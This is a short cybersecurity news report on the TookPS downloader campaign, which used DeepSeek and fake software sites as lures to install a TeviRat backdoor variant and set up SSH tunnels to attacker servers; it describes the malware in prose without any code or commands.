In early March 2025, researchers identified malicious operations using DeepSeek as bait, but subsequent telemetry analysis has revealed the TookPS downloader is targeting users through multiple vectors, including fraudulent websites mimicking official sources for remote desktop applications and 3D modeling software. Further analysis shows the malware deploys modified versions of known backdoors, including a variant of Backdoor.Win32.TeviRat that uses DLL sideloading techniques to compromise TeamViewer remote access software, enabling attackers to maintain persistent access while remaining hidden from users. Securelist security researchers identified that upon infiltrating a victim’s device, TookPS establishes communication with command and control servers using domains registered in early 2024. Through this tunnel, attackers gain full system access, allowing for arbitrary command execution and complete compromise of the victim’s environment. Additional monitoring has detected malicious executables disguised as popular software including Ableton music production suite and Quicken financial management applications, indicating the threat actors are casting a wide net to maximize infections. After initial infection, TookPS contacts its command servers to download a series of three PowerShell scripts that systematically compromise the target system. The malware reaches out to its C2 infrastructure, with different samples communicating with different domains, to retrieve base64-encoded PowerShell scripts that enable persistent access to compromised systems. This command initiates an SSH server that creates a tunnel between the infected device and the remote server controlled by the attackers. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 03 Apr 2025 12:40:14 +0000